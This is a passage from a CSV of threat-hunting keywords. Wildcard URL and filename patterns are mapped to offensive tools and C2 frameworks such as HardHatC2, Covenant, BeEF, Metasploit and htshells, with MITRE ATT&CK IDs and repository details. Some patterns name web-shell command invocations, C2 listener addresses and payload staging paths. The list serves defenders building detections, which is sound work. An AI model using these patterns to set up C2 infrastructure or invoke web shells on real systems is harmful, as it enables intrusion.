during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*:3000/hook.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http*:3200/manjusaka*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*http*:801/bq1iFEP2*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*http*127.0.0.1:21802*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:3030*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*http*127.0.0.1:5000*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:50050*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*http*127.0.0.1:5096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z 
-*http*127.0.0.1:57230*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*http*127.0.0.1:7096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:8080/*.dll*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:8080/*.exe*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:8080/*.ps1*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:9631*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:21802*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - 
TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:3030*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*http*localhost:5000*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:50050*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*http*localhost:5096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:57230*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*http*localhost:7096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z 
-*http*localhost:9631*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http.title:*BIG-IP®*- Redirect*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/aqhmal/CVE-2020-5902-Scanner,1,0,N/A,N/A,1,54,22,2022-12-08T11:03:15Z,2020-07-05T06:19:09Z -*HTTP/EXEGOL-01.*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*http://*/.htaccess?c=cmd*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*http://*/.htaccess?c=uname -a*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*http://*/FortyNorth/GetIt*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*http://*/FortyNorth/PostIt*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - 
TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*http://*Microsoft.ActiveDirectory.Management.dll*,offensive_tool_keyword,powershell,redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed,T1110.001 - T1110.003 - T1110.004,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1,1,1,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*http://10.10.13.37*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*http://127.0.0.1/CrossC2*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*http://127.0.0.1/FUZZ*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*http://127.0.0.1:3000/ui/panel*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http://127.0.0.1:35000*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*http://127.0.0.1:443/aaaaaaaaa*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*http://127.0.0.1:443/bbbbbbbbb*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*http://127.0.0.1:7444*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*http://127.0.0.1:7474/browser/*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,neo4j default local url,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*http://127.0.0.1:8000/1.jpg*,offensive_tool_keyword,cobaltstrike,Hou Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,0,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*http://127.0.0.1:8000/gate.html*,greyware_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,1,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*http://127.0.0.1:8080*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*http://127.0.0.1:8081*,greyware_tool_keyword,Browser-C2,Post Exploitation agent which uses a browser to do C2 operations.,T1105 - T1043 - T1102,TA0003 - TA0005 - TA0008,N/A,N/A,C2,https://github.com/0x09AL/Browser-C2,1,1,N/A,10,10,99,32,2018-05-25T15:12:21Z,2018-05-22T14:33:24Z -*http://127.0.0.1:9090/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*http://192.168.1.179:8000/session*,offensive_tool_keyword,CloakNDaggerC2,A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.,T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002,TA0011 - TA0042 - TA0003,N/A,N/A,C2,https://github.com/matt-culbert/CloakNDaggerC2,1,1,N/A,10,10,4,2,2023-10-02T19:54:24Z,2023-04-28T01:58:18Z -*http://LhOsT/FiLNaMe.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*http://localhost:3000/ui/panel*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http://localhost:30662*,offensive_tool_keyword,o365-attack-toolkit,A toolkit to attack Office365,T1110 - T1114 - T1119 - T1197 - T1087.002,TA0001 - TA0007 - TA0009,N/A,N/A,Credential Access,https://github.com/mdsecactivebreach/o365-attack-toolkit,1,1,N/A,10,10,954,218,2020-11-06T12:09:26Z,2019-07-22T10:39:46Z -*http://localhost:58082/broadcast?id=*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*http://localhost:7474/browser/*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,neo4j default local url,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*http://localhost:7681*,greyware_tool_keyword,supershell,Supershell is a C2 remote 
control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*http://localhost:8080*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*http://localhost:9090/*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*http://shell:7681/token*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,1,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -*http://tarantula.by.ru/localroot/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*http://tarantula.by.ru/localroot/2.6.x/h00lyshit*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*http://vpsip:28888*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*http://wfuzz.org*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*http_default_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_default_users.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_malleable.py*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*http_ntlmrelay.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*http_owa_common.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
